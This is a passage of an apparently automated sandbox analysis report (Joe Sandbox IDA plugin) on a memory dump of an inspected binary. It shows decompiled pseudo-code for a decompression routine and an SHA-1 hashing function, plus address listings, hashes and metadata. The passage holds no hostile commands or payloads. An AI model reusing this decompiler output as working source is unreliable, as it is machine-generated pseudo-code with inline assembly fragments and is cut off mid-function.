														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E00E7F750(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00E7839A(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00E7839A(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E00E6A9F3(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E00E74DF4(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E00E73FAE(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00e77304
0x00e77308
0x00e7730e
0x00e77337
0x00e7733a
0x00e7733f
0x00e77342
0x00e77329
0x00e77329
0x00000000
0x00e77344
0x00e7734f
0x00e77352
0x00e77355
0x00e77359
0x00e7735d
0x00e77361
0x00e77363
0x00e77365
0x00e77365
0x00e77369
0x00e77376
0x00e77376
0x00e7737c
0x00e7737f
0x00e77381
0x00e77385
0x00000000
0x00000000
0x00e77387
0x00e77387
0x00e77389
0x00e77914
0x00e77914
0x00e77916
0x00000000
0x00e77917
0x00e7738f
0x00e7739d
0x00e7739d
0x00e7739f
0x00e773ae
0x00e773ae
0x00e773b4
0x00e77c63
0x00e77c63
0x00000000
0x00e77c63
0x00000000
0x00e773b4
0x00e773a1
0x00e773a8
0x00000000
0x00000000
0x00000000
0x00e773a8
0x00e77394
0x00e77397
0x00000000
0x00000000
0x00000000
0x00e773ba
0x00e773ba
0x00e773c7
0x00e773cc
0x00e77400
0x00e77400
0x00e77405
0x00e7740c
0x00e77412
0x00e77418
0x00e7741c
0x00e77456
0x00e77457
0x00e77458
0x00e7745a
0x00e77473
0x00e77476
0x00e7747d
0x00e77480
0x00e77483
0x00e7748c
0x00e77495
0x00e77497
0x00e7749a
0x00e7749c
0x00e7749c
0x00e7749e
0x00e774a6
0x00e774a9
0x00e774ae
0x00e774b0
0x00e774c9
0x00e774cf
0x00e778eb
0x00e778ed
0x00e77920
0x00e77926
0x00e77a42
0x00e77a42
0x00e77a4b
0x00e77a4e
0x00e77a50
0x00e77a54
0x00e77a63
0x00e77a63
0x00e77a66
0x00e77a6b
0x00e77a72
0x00e77a78
0x00e77a7e
0x00e77a85
0x00e77ab3
0x00e77ab4
0x00e77ab5
0x00e77ab7
0x00e77ad3
0x00e77ad6
0x00e77add
0x00e77ae0
0x00e77ae3
0x00e77aef
0x00e77afb
0x00e77afd
0x00e77b03
0x00e77b05
0x00e77b05
0x00e77b07
0x00e77b0f
0x00e77b0f
0x00e77b12
0x00e77b15
0x00e77b26
0x00e77b29
0x00e77b29
0x00e77b17
0x00e77b17
0x00e77b17
0x00e77b2b
0x00e77b2e
0x00e77b30
0x00e77b35
0x00e77b3c
0x00e77b44
0x00e77b46
0x00e77b4d
0x00e77b50
0x00e77b50
0x00e77b53
0x00e77b53
0x00e77b56
0x00e77b61
0x00e77b65
0x00e77b6a
0x00e77b6d
0x00e77b6f
0x00e77c23
0x00e77c23
0x00e77c26
0x00e77c28
0x00000000
0x00000000
0x00e77c2e
0x00e77c34
0x00e77c3a
0x00e77c3f
0x00e77c43
0x00e77c49
0x00e77c52
0x00e77c55
0x00e77c55
0x00e77c55
0x00e77c5a
0x00e77c5a
0x00e774c1
0x00e774c1
0x00000000
0x00e77b75
0x00e77b75
0x00e77b77
0x00000000
0x00000000
0x00e77b7d
0x00e77b83
0x00e77b85
0x00e77b8b
0x00e77b8f
0x00e77b92
0x00e77b96
0x00e77be8
0x00e77beb
0x00e7781f
0x00e7781f
0x00e77822
0x00e77824
0x00e7736e
0x00e77372
0x00e77372
0x00e77376
0x00e77376
0x00e7737c
0x00e7737f
0x00e77381
0x00e77385
0x00000000
0x00000000
0x00000000
0x00e77385
0x00e77376
0x00e7782d
0x00e7782f
0x00e77832
0x00e77835
0x00000000
0x00000000
0x00e7783e
0x00e77841
0x00e77844
0x00e77847
0x00000000
0x00000000
0x00e77850
0x00e77853
0x00e77856
0x00e77859
0x00000000
0x00000000
0x00e77862
0x00e77865
0x00e77868
0x00e7786b
0x00000000
0x00000000
0x00e77874
0x00e77877
0x00e7787a
0x00e7787d
0x00000000
0x00000000
0x00e77886
0x00e77889
0x00e7788d
0x00e77890
0x00e77893
0x00e7789c
0x00e7789f
0x00e7789f
0x00000000
0x00e77893
0x00e77bf3
0x00e77bf3
0x00e77bf6
0x00e77bfa
0x00e77bfc
0x00e77c00
0x00e77c05
0x00e77c09
0x00e77c0c
0x00e77c0f
0x00e77c12
0x00e77c15
0x00e77c19
0x00e77c19
0x00e77c19
0x00e7781b
0x00e7781b
0x00000000
0x00e7781b
0x00e77b98
0x00e77b9b
0x00000000
0x00000000
0x00e77ba3
0x00e77ba3
0x00e77ba6
0x00e77ba9
0x00e77bac
0x00e77bb1
0x00e77bb7
0x00e77bbd
0x00e77bc3
0x00e77bc9
0x00e77bcf
0x00e77bd2
0x00e77bd5
0x00e77bd8
0x00e77bdb
0x00e77bde
0x00e77bde
0x00e77bde
0x00000000
0x00e77be3
0x00e77b6f
0x00e77abf
0x00e77ac2
0x00e77ac2
0x00e77ac4
0x00000000
0x00000000
0x00e77ac6
0x00e77ac7
0x00e77aca
0x00e77acd
0x00000000
0x00000000
0x00000000
0x00e77acf
0x00e77ad1
0x00000000
0x00e77ad1
0x00e77a89
0x00e77a8c
0x00e77a96
0x00e77a9e
0x00e77aa4
0x00e77aa7
0x00000000
0x00000000
0x00000000
0x00000000
0x00e77a56
0x00e77a56
0x00e77a59
0x00e77a5b
0x00e77a5e
0x00e77a5e
0x00e77a5e
0x00000000
0x00e77a56
0x00e7792c
0x00e7792f
0x00e77933
0x00e77935
0x00e7744b
0x00e7744b
0x00000000
0x00e7744b
0x00e7793b
0x00e7793e
0x00e77943
0x00e77945
0x00e7794f
0x00e77954
0x00e77956
0x00e77a06
0x00e77a06
0x00e77a09
0x00e77a0b
0x00000000
0x00000000
0x00e77a11
0x00e77a17
0x00e77a1d
0x00e77a22
0x00e77a26
0x00e77a2c
0x00e77a35
0x00e77a38
0x00e77a38
0x00e77a38
0x00000000
0x00e77a3d
0x00e7795c
0x00e7795e
0x00000000
0x00000000
0x00e77964
0x00e7796a
0x00e7796c
0x00e77972
0x00e77976
0x00e77979
0x00e7797d
0x00e779cf
0x00e779d2
0x00000000
0x00000000
0x00e779da
0x00e779da
0x00e779dd
0x00e779df
0x00e779e3
0x00e779e8
0x00e779ec
0x00e779ef
0x00e779f2
0x00e779f5
0x00e779f8
0x00e779fc
0x00e779fc
0x00e779fc
0x00000000
0x00e77a01
0x00e7797f
0x00e77982
0x00000000
0x00000000
0x00e7798a
0x00e7798a
0x00e7798d
0x00e77990
0x00e77993
0x00e77998
0x00e7799e
0x00e779a4
0x00e779aa
0x00e779b0
0x00e779b6
0x00e779b9
0x00e779bc
0x00e779bf
0x00e779c2
0x00e779c5
0x00e779c5
0x00e779c5
0x00000000
0x00e779ca
0x00e778f3
0x00e778f7
0x00e778fc
0x00e778fe
0x00000000
0x00000000
0x00e77907
0x00e7790c
0x00e7790e
0x00000000
0x00000000
0x00000000
0x00e7790e
0x00e774d5
0x00e774db
0x00e774de
0x00e774ef
0x00e774f2
0x00e774f2
0x00e774e0
0x00e774e0
0x00e774e0
0x00e774f4
0x00e774f7
0x00e774f9
0x00e77523
0x00e774fb
0x00e774fd
0x00e77504
0x00e7750c
0x00e7750e
0x00e77510
0x00e77518
0x00e7751e
0x00e7751e
0x00e77528
0x00e7752f
0x00e77535
0x00e7753b
0x00e77542
0x00e77570
0x00e77571
0x00e77572
0x00e77574
0x00e77590
0x00e77593
0x00e7759a
0x00e7759d
0x00e775a0
0x00e775ac
0x00e775b8
0x00e775ba
0x00e775c0
0x00e775c2
0x00e775c2
0x00e775c4
0x00000000
0x00e775c4
0x00e7757c
0x00e7757f
0x00e7757f
0x00e77581
0x00000000
0x00000000
0x00e77583
0x00e77584
0x00e77587
0x00e7758a
0x00000000
0x00000000
0x00000000
0x00e7758c
0x00e7758e
0x00000000
0x00e77544
0x00e77546
0x00e77549
0x00e77553
0x00e7755b
0x00e77561
0x00e77564
0x00e775cc
0x00e775cc
0x00e775cf
0x00e775d2
0x00e775e2
0x00e775e5
0x00e775e5
0x00e775d4
0x00e775d4
0x00e775d4
0x00e775e7
0x00e775eb
0x00e775ee
0x00e775f2
0x00e775f4
0x00e775f8
0x00e775fa
0x00e7772b
0x00e7772b
0x00e77731
0x00e77733
0x00e77734
0x00e7773a
0x00e7773c
0x00e7773d
0x00e77743
0x00e77745
0x00e77745
0x00e77745
0x00e77743
0x00e7773a
0x00e77749
0x00e7774f
0x00e77755
0x00e77758
0x00e7775b
0x00e77766
0x00e77768
0x00e7776d
0x00e77770
0x00e77774
0x00e77776
0x00e778a7
0x00e778a7
0x00e778ab
0x00e778ae
0x00e778b0
0x00000000
0x00000000
0x00e778b6
0x00e778bc
0x00e778c0
0x00e778c6
0x00e778cb
0x00e778cf
0x00e778d5
0x00e778de
0x00e778e1
0x00e778e1
0x00e778e1
0x00000000
0x00e7777c
0x00e7777c
0x00e7777e
0x00000000
0x00000000
0x00e77784
0x00e7778a
0x00e7778d
0x00e77793
0x00e77797
0x00e7779a
0x00e7779e
0x00e777e9
0x00e777ec
0x00000000
0x00000000
0x00e777f0
0x00e777f0
0x00e777f3
0x00e777f7
0x00e777f9
0x00e777fd
0x00e77802
0x00e77806
0x00e77809
0x00e7780c
0x00e7780f
0x00e77812
0x00e77816
0x00e77816
0x00e77816
0x00000000
0x00e777f9
0x00e777a0
0x00e777a3
0x00000000
0x00000000
0x00e777a7
0x00e777a7
0x00e777aa
0x00e777ad
0x00e777b0
0x00e777b5
0x00e777bb
0x00e777c1
0x00e777c7
0x00e777cd
0x00e777d3
0x00e777d6
0x00e777d9
0x00e777dc
0x00e777df
0x00e777e2
0x00e777e2
0x00e777e2
0x00000000
0x00e777e7
0x00e77600
0x00e77600
0x00e77603
0x00e776fe
0x00e77707
0x00e77711
0x00e77715
0x00e7771e
0x00e77721
0x00e77721
0x00e77724
0x00e77727
0x00e77727
0x00000000
0x00e77727
0x00e77609
0x00e7763f
0x00e7760b
0x00e7760e
0x00e77613
0x00e7761b
0x00e77623
0x00e77626
0x00e7762e
0x00e77635
0x00e7763a
0x00e7763a
0x00e77644
0x00e7764b
0x00e77651
0x00e77657
0x00e7765e
0x00e7768c
0x00e7768d
0x00e7768e
0x00e77692
0x00e77694
0x00e776b2
0x00e776b5
0x00e776c1
0x00e776c4
0x00e776c8
0x00e776cd
0x00e776e0
0x00e776e2
0x00e776e8
0x00e776ea
0x00e776ea
0x00e776ec
0x00000000
0x00e776ec
0x00e7769c
0x00e7769f
0x00e7769f
0x00e776a1
0x00000000
0x00000000
0x00e776a3
0x00e776a4
0x00e776a7
0x00e776aa
0x00000000
0x00000000
0x00000000
0x00e776ac
0x00e776ae
0x00000000
0x00e77660
0x00e77662
0x00e77665
0x00e7766f
0x00e77677
0x00e7767d
0x00e77680
0x00e776f4
0x00e776f7
0x00000000
0x00e776f7
0x00e7765e
0x00e775fa
0x00e77542
0x00e774bb
0x00e774be
0x00e774be
0x00e774be
0x00000000
0x00e774be
0x00e7745f
0x00e77462
0x00e77462
0x00e77464
0x00000000
0x00000000
0x00e77466
0x00e77467
0x00e7746a
0x00e7746d
0x00000000
0x00000000
0x00000000
0x00e7746f
0x00e77471
0x00000000
0x00e77471
0x00e77420
0x00e77423
0x00e7742d
0x00e77435
0x00e7743b
0x00e7743e
0x00e77441
0x00000000
0x00e77441
0x00e773ce
0x00e773d1
0x00000000
0x00000000
0x00e773d5
0x00e773e0
0x00e773e6
0x00e77c6f
0x00e77c6f
0x00000000
0x00e77c6f
0x00e773ec
0x00000000
0x00000000
0x00e773f4
0x00e773fa
0x00000000
0x00000000
0x00000000
0x00e773fa
0x00e77376
0x00e77342
0x00e77313
0x00e77317
0x00e7731b
0x00e7731f
0x00e77327
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1934457230b8a5889079426b7d709a5a451781bce21afd7ed3a4cdc0267fc13d
Instruction ID: 409a49151f7a865eb005e4c51ece59ad93c4a68d0af451fa66dd87f95f865ae6
Opcode Fuzzy Hash: 1934457230b8a5889079426b7d709a5a451781bce21afd7ed3a4cdc0267fc13d
Instruction Fuzzy Hash: 1E62F0706087869FC719CF28C8805A9FBE1FB55308F14D66ED9EA9B742E330E955CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00E6EFEF Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00E6EFEF(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00E7F750(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E00E86354( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E00E86354(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E00E86354( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E00E86354( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E00E86354( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00E86354(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
